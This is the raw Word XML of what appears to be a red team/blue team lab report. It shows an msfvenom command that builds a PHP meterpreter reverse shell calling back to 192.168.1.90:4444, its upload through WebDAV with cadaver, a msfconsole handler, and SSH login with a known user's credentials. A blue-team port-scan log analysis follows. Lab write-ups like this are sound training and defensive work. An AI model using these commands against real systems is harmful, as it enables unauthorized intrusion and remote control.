      <w:r w:rsidR="006B15D1">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B15D1">
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B15D1">
        <w:t xml:space="preserve"> and SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3464509D" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07757766" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="96"/>
        <w:ind w:left="457" w:right="8848"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Tools &amp; Processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407227CC" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
        <w:ind w:left="457" w:right="8875"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>From the previous steps I already had access to the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766D893C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
        <w:ind w:left="457" w:right="12045"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>webdav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6336B19D" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="701"/>
        </w:tabs>
        <w:spacing w:before="16" w:line="252" w:lineRule="auto"/>
        <w:ind w:right="8937" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">First was to create a reverse shell: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:spacing w:val="-37"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>–p php/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">=192.168.1.90 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>=4444 –f raw –o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4448C6C0" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="697"/>
        </w:tabs>
        <w:spacing w:line="266" w:lineRule="auto"/>
        <w:ind w:right="9156" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Then using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cadaver 192.168.1.105/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>webdav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">I accessed the folder then using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">put </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">I uploaded the ﬁle (this step could have also been used using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> GUI of the ﬁle manager as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>well)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FD911D" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="701"/>
        </w:tabs>
        <w:spacing w:before="2" w:line="261" w:lineRule="auto"/>
        <w:ind w:right="9060" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Now I have to setup the payload using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, by using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>multi/handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, setting local host of my kali machine, setting open </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and setting the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>php/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:spacing w:val="-34"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B4C573" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="701"/>
        </w:tabs>
        <w:spacing w:before="6" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="9182" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">I also can simply </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-36"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">because port 22 is open and I know </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ryan’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">credentials. (Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is bit more cunning as it is harder to spot in logs but still can be ﬂagged by preset </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">“Alarms”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Kibana)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A07A44C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="240" w:lineRule="exact"/>
        <w:ind w:left="2143"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Achievements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6236B114" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="486" w:right="8962"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>By</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>gaining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meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>shell,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proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SSHing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 192.168.1.105 I gain full control of the system and can now use the command line to do as I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>please</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67343251" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/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587B3666" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D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7179264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6EBC4FC7" wp14:editId="494D6726">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>274319</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>274879</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="8595332" cy="4608635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone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32" cy="460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2D341" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DCF232D" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E8568E2" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F15A9C1" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D1E0A22" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14779CF6" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BCD3E57" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BDD798E" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="909" w:lineRule="exact"/>
        <w:ind w:right="557"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>Blue Team</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8D1049" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="218" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Log Analysis and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Attack Characterization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B66FE0" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61EEB66B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DD9231B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E247C6E" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48C65596" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BCE3C39" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E943A7" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CD53BB4" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B6040A7" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="369D45D2" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:before="96"/>
        <w:ind w:right="250"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8C6C92" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:sectPr w:rsidR="00377979">
          <w:pgSz w:w="14400" w:h="8100" w:orient="landscape"/>
          <w:pgMar w:top="720" w:right="180" w:bottom="0" w:left="280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082DEA5E" w14:textId="519B6543" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:right="26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07808" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="397AFF56" wp14:editId="2E4614DE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98" name="Lin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48A946" id="Line 88" o:spid="_x0000_s1026" style="position:absolute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" strokecolor="#595959">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:t>Analysis: Identifying the Port Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6484DD01" w14:textId="7E57EE95" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1499"/>
        </w:tabs>
        <w:spacing w:before="141" w:line="287" w:lineRule="exact"/>
        <w:ind w:hanging="290"/>
      </w:pPr>
      <w:r>
        <w:t>Port scan started on Nov 11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="000A2543">
        <w:t>2021,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A2543">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="000A2543">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="000A2543">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>dnight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581F6CCB" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1499"/>
        </w:tabs>
        <w:spacing w:line="289" w:lineRule="exact"/>
        <w:ind w:hanging="290"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Around </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">136841 </w:t>
      </w:r>
      <w:r>
        <w:t>packets worth 740GB were sent with the source IP of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>192.168.1.90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489D8422" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1499"/>
        </w:tabs>
        <w:spacing w:before="3"/>
        <w:ind w:hanging="290"/>
      </w:pPr>
      <w:r>
        <w:t>The sudden huge peak in network traﬃc indicates that this was indeed a port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE2E4C4" w14:textId="3FEBF96F" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7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3EA25A9D" wp14:editId="430C0A17">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>367665</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>159385</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8424545" cy="2384425"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="9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24545" cy="2384425"/>
                          <a:chOff x="579" y="251"/>
                          <a:chExt cx="13267" cy="3755"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="9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" y="250"/>
                            <a:ext cx="13267" cy="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578" y="250"/>
                            <a:ext cx="13267" cy="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215FD" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979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14:paraId="32226B6B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979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14:paraId="6D7FBFE9" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                              <w:pPr>
                                <w:rPr>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                            <w:p w14:paraId="58F237E4" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                              <w:pPr>
                                <w:spacing w:before="7"/>
                                <w:rPr>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                            <w:p w14:paraId="2AE26F08" w14:textId="5751E830" w:rsidR="00377979" w:rsidRDefault="00377979">
                              <w:pPr>
                                <w:ind w:left="2877" w:right="2917"/>
                                <w:jc w:val="center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A25A9D" id="Group 85" o:spid="_x0000_s1063" style="position:absolute;margin-left:28.95pt;margin-top:12.55pt;width:663.35pt;height:187.75pt;z-index:-15707648;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="579,251" coordsize="13267,3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">
